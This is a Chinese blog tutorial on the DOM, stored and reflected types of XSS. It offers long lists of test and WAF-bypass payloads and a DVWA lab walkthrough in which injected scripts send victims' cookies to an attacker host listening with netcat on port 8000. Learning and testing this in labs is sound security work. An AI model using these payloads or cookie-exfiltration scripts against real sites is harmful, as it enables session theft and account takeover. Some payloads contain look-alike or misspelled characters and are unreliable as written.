XSS漏洞|DOM型、存储型、反射型

原创 已于 2025-07-21 00:59:53 修改 · 996 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #安全 #web安全

于 2025-07-21 00:58:16 首次发布

一、XSS漏洞

目录

一、XSS漏洞

1、XSS漏洞简介

2、漏洞产生原理

3、漏洞的危害

4、漏洞分类

5、XSS攻击示例(GET传参)

6、XSS绕过方法

 6.1、编码绕过

6.2、等价替换

6.3 大小写绕过

6.4 函数拼接绕过

7、XSS攻击

7.1、XSS攻击常见测试Payload

7.2、XSS攻击常见绕过手法

二、DOM型XSS

1、DOM型XSS简介

2、XSS攻击步骤

3、XSS测试语句

4、DOM型XSS漏洞利用

三、存储型XSS

1、XSS存储型

2、XSS存储型示例

四、反射型 XSS(非持久型 / 参数型)

1、反射型XSS介绍

2、反射型 XSS 的示例

2.1实例代码

2.2弹窗示例

1、XSS漏洞简介

        XSS全称(跨站脚本攻击),是将恶意 JavaScript 代码插入到Web页面中,当用户浏览到该页面时这些嵌入在Web页面的代码就会被执行,从而到达攻击者的攻击目的。

2、漏洞产生原理

        形成XSS漏洞主要原因是:因为Web应用程序对用户输入的内容和程序输出的内容没有经过严格的校验和过滤,导致攻击者构造的恶意代码被带入后,又被当作正常的代码输出至前端页面,浏览器当作有效代码解析执行从而产生危害。

3、漏洞的危害

  • 窃取用户 Cookie 信息
  • 网络钓鱼,包括获取各类用户浏览器账号
  • 劫持用户浏览器,从而执行任意操作
  • 网页挂马
  • 配合其他漏洞使用,如(CSRF等)实施进一步危害
  • 传播跨站脚本蠕虫等

4、漏洞分类

        XSS漏洞可以分为三种类型: 反射型 、 存储型 、 DOM型XSS

5、XSS攻击示例(GET传参)

         1、攻击者针对www.example.com的一个正常接收GET传参链接进行测试:        http://www.example.com/search?query=pilot

        2、将参数值修改为JS弹窗代码进行测试:

        http://www.example.com/search?query=<script>alert(123)</script>

        3、若该参数未经处理直接拼接到JS中,则会直接执行弹窗代码。若将弹窗代码修改为恶意攻击代码,则会产生严重安全问题。

6、XSS绕过方法

 6.1、编码绕过

        Payload: <a href="javascript:alert(1)">test</a>

        <input onlick="alert(1)">

  • 十进制

<a href="javascript:alert(1)">test</a>

  • 十六进制

<a href="javascript:alert(1)">test</a>

  • URL编码

(url 解析过程中,不能对协议类型进行任何的编码操作,所以 javascript: 协议头需要保留)

<a href="javascript:%61%6c%65%72%74%28%31%29">test</a>

<iframe src="javascript:%61%6c%65%72%74%28%31%29">test</iframe>

  • JS编码

<script>\u0061\u006c\u0065\u0072\u0074('xss');</script>

<img src=x οnerrοr="\u0061\u006c\u0065\u0072\u0074(1)">

6.2、等价替换

当页面过滤 alert 这个函数时,因为这个函数会弹窗,不仅很多程序会对他进行 过滤,而且很多waf都会对其进行拦截。所以不存在 alert 即可

  • <script>prompt(/xss/);</script>
  • <script>confirm(1);</script>
  • <script src=http://www.xss123.com/eciAKj?1623635663></script>

6.3 大小写绕过

<ScRiPt>AlErT(/xss/)</sCrIpT>

6.4 函数拼接绕过

  • <img src="x"οnerrοr="eval('al+ert(1)')">
  • <img src="x" οnerrοr="top['al'+'ert'](1)">
  • <img src="x" οnerrοr="window['al'+'ert'](1)">
  • <img src="x" οnerrοr="self[`al`+`ert`](1)">

7、XSS攻击

  • 7.1、XSS攻击常见测试Payload
<script>alert(123)</script>
<script>`xss`</script>
<script>alert(/xss/)</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script>setTimeout(alert(1),0)</script>
<script>alert(String.fromCharCode(49,49))</script>
<script>onerror=alert;throw 1337</script>
<script///////////////////////////////////////////////>alert(123)</script>

<img src=1 onerror=alert(1)>
'"><iMg SrC=x OnErRoR=alert(1)>{{7*7}}
<img/src="xss"οnerrοr=alert`1`>

<input onfocus="alert('xss');">
<input οnblur=alert("xss") autofocus><input autofocus> //竞争焦点,从而触发onblur事件
<input onfocus="alert('xss');" autofocus>
<input type="image" formaction=JaVaScript:alert(0)>
  
<svg οnlοad=alert("xss");>
<svg/οnlοad=prompt(1);>
  
<iframe οnlοad=alert("xss");></iframe>
<IFRAME SRC="javascript:alert(29);"></IFRAME>

<video><source onerror="alert(1)">
<audio src=x οnerrοr=alert("xss");>
  
<body onload=prompt(1);>
<body background="javascript:alert(1)">

<a onmouseover=alert(1)>M
<a onclick=alert(1)>M
<a href=javascript:alert(1)>M
<a href=javasc&#114;ipt:%61%6c%65%72%74%28%31%29>M
<a href="javascript:alert('test')">link</a>

<div onclick="alert('xss')">
<div onmouseenter="alert('xss')"> 

<form/action=javascript:alert(22)><input/type=submit>
<form onsubmit=alert(23)><button>M
  • 7.2、XSS攻击常见绕过手法
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<sCrIpt>alert(/xss/)</ScRipt>
%3cscript%3ealert("XSS");%3c/script%3e
<x>%00%00%00%00%00%00%00<script>alert(1)</script>

%3CsCrIpt%3Ealert(%2Fxss%2F)%3C%2FScRipt%3E
%3c%73%43%72%49%70%74%3e%61%6c%65%72%74%28%2f%78%73%73%2f%29%3c%2f%53%63%52%69%70%74%3e
%253CsCrIpt%253Ealert(%252Fxss%252F)%253C%252FScRipt%253E

  • 7.3、通过不常见的标签绕过

<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus> //通过autofocus属性执行本身的focus事件

<details open OntogGle="alert(1)">
  
<video><source onerror="alert(1)">
<audio src=x οnerrοr=alert("xss");>
  
<textarea οnfοcus=alert("xss"); autofocus>
  
<marquee onstart=alert(1)>hack the planet</marquee>  //Chrome不行,火狐和IE都可以

<style onload=alert(1) />

<object data="javascript:alert(document.domain)">

二、DOM型XSS

1、DOM型XSS简介

        DOM全称Document Object Model,使用DOM可以使程序和脚本能够动态访问和更新文档的内容、结构及样式。DOM型XSS是非持久型XSS,且不与后台服务器产生数据交互,而是通过JS修改网页的DOM来执行恶意脚本进行攻击。注意,DOM型XSS与反射型和存储型最大的区别在于,DOM型XSS不经过服务端,全部的攻击过程都在客户端完成。

       HTML的标签都是节点,而这些节点组成了DOM的整体结构 --> DOM树 。HTML DOM树中的所有节点均可以通过JavaScript进行访问。所有HTML元素均可被修改、创建、删除、查找。

document.getElementById("dom").innerHTML = '内容'

<html>

<body>

<button οnclick="displayDate()">点击获取当前时间</button>

<p id="demo">123123123123</p>

<script>

function displayDate() {

document.getElementById("demo").innerHTML='更新demo节点';

}

</script>

</body>

</html>

  • 输入内容
  • 点击按钮触发onclick 执行domxss函数
  • 通过doucment方法获取text标签内容我们输入的内容
  • 将我们输入的内容拼接<a>标签打印到<div id="dom">的节点上

2、XSS攻击步骤

  • 攻击者找到一个可被用户访问的页面,该页面包含有漏洞的 JavaScript 代码或由用户输入直接生成的 DOM 结构。
  • 攻击者通过某种方式,例如发送特制的 URL 或通过篡改页面内容的方式,将恶意代码注入到页面中。
  • 用户在浏览器中访问被注入恶意代码的页面时,浏览器解析并执行了这些代码,从而触发了攻击。
  • 恶意代码在用户的浏览器中修改了页面的 DOM 树结构,通过操作 DOM 元素和属性,攻击者可以实现各种攻击行为,如盗取用户信息、篡改页面内容等。

3、XSS测试语句

        在网站是否存在 xss 漏洞时,应该输入一些标签如<、>输入后查看网页源代码是否过滤标签,如果没过滤,很大可能存在 xss 漏洞

常用XSS语句:

  • "><img src=x οnerrοr=alert(1)>
  • <script>alert(1)</script>
  • <script>console.log(1)</script>
  • <img src=x οnerrοr=alert(1)>
  • <svg οnlοad=alert(1)>
  • <svg/οnlοad=setTimeout('\x61\x6C\x65\x72\x74\x28\x31\x29')>
  • ' οnfοcus=javascript:alert() '
  • <a href="javascript:alert(1)">test</a>

4、DOM型XSS漏洞利用

        DOM型在url注入一段js代码就会触发xss了,是他自身就带有未被过滤里的js代码,我们就利用这个特性进行漏洞利用。

我们随便选择一个,url就出现了刚刚选择的语言。
http://192.168.1.5/dvwa/vulnerabilities/xss_d/?default=French

查看源码后,存在了这样一段,输入什么,在地址那里就出现什么。我们就注入一段代码试试。

http://192.168.1.5/dvwa/vulnerabilities/xss_d/?default=<script>aler(123)</script>

弹出窗口了。

三、存储型XSS

1、XSS存储型

        xss存储型是一种当你 输入js代码进去,就会弹回一个窗口,之后,你点其他页面之后,再回来点击刚刚输入的地方,又会给弹出一个窗口出来,顾名思义,急救室输入的代码以及存进你输入的地方了,不管你刷新多少次,都会弹多少窗口给你。

2、XSS存储型示例

我们打开kali中的dvwa,将等级调到低级,选择xss存储型的漏洞,出现以下页面

我们在内容上注入看看。

我们输入什么,在下面都会输出来。

我们输入一下语句。

<script>alert(123)</script>

退出之后,回来,在点击一次xss存储型的地方,又会出现弹窗了.

证明了漏洞的存在,我们就需要获取到用户的cookie,我们输入以下代码:

<script>alert(document.cookie)</script>

cookie拿到了。但是这样太明显了,我们不需要对方看到cookie信息,我们就需要进对方的信息输入到我们的攻击机上去。

我们输入以下语句:

<script>new Image().src="http://192.168.124.131/?output"+document.cookie</script>

我们发现长度不够,我们就利用控制台修改一下长度。

点击F12,进入控制台,对准方框,在图片最左侧的长度修改为10000,,masxlength=“10000”。

我们就可以写入了。我们监听的是8000端口,我们看看kali是否有回显。
在kali上输入nc -nvlp 8000进行监听

<script>new Image().src="http://192.168.124.131:8000/?output"+document.cookie</script>

成功返回了cookie。

四、反射型 XSS(非持久型 / 参数型)

1、反射型XSS介绍

        反射型 XSS 也被称为非持久型或参数型跨站脚本攻击。其恶意代码并没有保存在目标网站,而是通过诱导用户点击一个包含恶意链接的 URL 来实施攻击。

案例:

  1. 发送一个恶意链接给别人,当别人点击该链接访问目标网站时,会出现弹窗。例如:“我这边有这样的一个链接,把这个链接发给别人,别人访问一下就会有一个弹窗。”
  2.  在网页上输入一段 JS 脚本代码并提交,会有一个弹窗,但这一次执行完后就没有了。例如:“我们在这边输入一个随便输入一个东西,然后输入一段 JS 脚本,提交哎它会有一个弹窗,这一次执行完后就没有了,所以也叫做非持久型。”

2、反射型 XSS 的示例

2.1实例代码

<!DOCTYPE html>
<html>
 
<body>
  <a href="http://example.com/?param=<script>alert('反射型 XSS')</script>">点击我</a>
</body>
 
</html>

2.2弹窗示例

反射型就是在方框内输入js代码直接返回一个弹窗。

同样是输入什么就返回什么,我们就输入js代码

同样,我们监听8000端口窃取cookie看看

<script>new Image().src="http://192.168.124.131:8000/?output"+document.cookie</script>

同样返回了。

pdxdhmk318
关注
反射/存储/DOMXSS攻击原理及攻击流程详解
G3et的博客
01-02 2337
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,其允许攻击者在恶意用户的浏览器中执行脚本。这可能导致数据泄露、控制用户浏览器或执行其他恶意操作。 XSS 攻击通常利用网页的客户端代码(通常是 HTML 或 JavaScript)来执行。攻击者可能会向网页中插入恶意的 HTML 元素或 JavaScript 代码,试图欺骗浏览器执行攻击者的脚本。
XSS漏洞(一)
不秃头的程序Yang
05-15 680
一、漏洞介绍 XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击 缩写为 XSSXSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面, 供给其它用户访问,当用户访问到有恶意代码的网页就会产生 xss 攻击。 二、攻击危害 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 3、盗窃企业重要的
3-4DomXSS详解以及演示
山兔的博客
04-21 3675
学习DOMXSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
xss漏洞
Cracker's Blog
03-18 243
0x00 前言 xss漏洞是往web站点恶意插入JS代码,由web的后端语言 将JS代码输出并在浏览器运行,达到恶意攻击用户的目的。利用方式多种多样,是非常危险的漏洞DOM :一种操作可扩展标记语言(如HTML、XML等)的javascriptAPI 文档(document):一个页面就是一个文档 元素(element):页面中的使用标签 节点(node):页面中的所有内容都是节点(标签...
[漏洞篇]XSS漏洞详解
最新发布
yy1715713348的博客
07-01 715
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
如何利用反射性xss漏洞反射型xssdomxss以及存储xss这三类xss有什么区别
weixin_57108799的博客
03-16 909
反射型XSS的被攻击对象一般是攻击者去寻找的,而存储XSS是广撒网的方式或者指定的方式,就是攻击者将存储XSS放在一些有XSS漏洞的网站上
DVWA靶场通关——DOMXSS漏洞
sucker的博客
11-29 3108
DOMXSSDOM-based Cross-Site Scripting,DOM XSS)是一种跨站脚本攻击(XSS)的变种,它与传统的反射型XSS(Reflected XSS)或存储XSS(Stored XSS)有所不同,主要是发生在客户端(浏览器端),并且依赖于网页中动态的文档对象模DOM)结构。:如果页面存在涉及状态更改的操作(如修改密码、删除内容等),而没有对请求进行适当的防护(例如 CSRF token),攻击者可以利用该漏洞执行伪造的操作,导致用户的会话受到攻击。
XSS漏洞
zhoutong2323的博客
04-19 3545
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
Web安全基础学习:XSS跨站脚本漏洞DOMXSS
qq_51862722的博客
06-19 2263
DOMXSS漏洞:非持久XSS,且不与后台服务器产生数据交互,而是通过JS修改网页的DOM来执行恶意脚本进行攻击。注意,DOMXSS反射型存储最大的区别在于,DOMXSS不经过服务端,全部的攻击过程都在客户端完成。
DOM XSS 攻击演示(附链接)
Flag少侠的博客
01-25 5776
DOM XSS 攻击演示(附链接)
xss漏洞-反射+存储+DOM
xiaoheizi的博客
06-29 247
最典的例子就是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言就会从数据库中加载出来并显示,于是触发了XSS攻击。基于DOMXSS,也就是服务器端不参与,仅仅涉及到浏览器的XSS,如果浏览器没有对用户的输入进行过滤,那么也就导致XSS攻击的产生。服务器没有对用户提交的数据做过滤或者过滤不严谨,直接回显到了用户浏览器,浏览器对其进行了js解析并执行,导致了xss漏洞。提交一条留言,发现留言在下面显示,重新刷新页面留言依然在,说明留言被服务端保存在数据库了。
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
存储XSS反射型XSSDOMXSS不同,它不是通过URL参数或者DOM动态生成的,而是将恶意代码存储在了服务器上,比如用户评论、论坛帖子等地方。当其他用户访问这些含有恶意代码的页面时,浏览器会执行其中的脚本,...
XSS攻击(反射型存储dom、PDF、SWF、SVG)
weixin_46013320的博客
04-14 632
XSS是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中 Web 里面的脚本代码会被执行,从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
zz12345600354的博客
04-23 1339
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
漏洞篇之DOMxss
weixin_46446401的博客
03-03 8592
介绍了domxss的原理和特点,并讲解了pikachu这个靶场的例子
反射型XSS漏洞
fencecat的博客
12-31 1万+
实验项目 反射型XSS实验 综合性实验 2020年10月 22日 一、实验综述 1.实验目的及要求 (1)什么是XSS XSS,全称跨站脚本,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 (2)XSS分成两类: 一类是来自内部的,主要指的是利用程序自身的漏洞,构造跨站语句。 另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。 如当我们要一个站点,我们自己构造一个有跨站漏洞的网页...
Xss漏洞
LS_Sy的博客
03-07 809
XSS又叫CSS(Cross Site Script)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的​ xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。
XSS漏洞总结之小试牛刀
热门推荐
MX的博客
06-20 2万+
一:XSS漏洞总结 1&amp;amp;amp;gt;:简介 XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2&amp;amp;amp;gt;: 分类及危害 XSS分类: 反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。 存
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值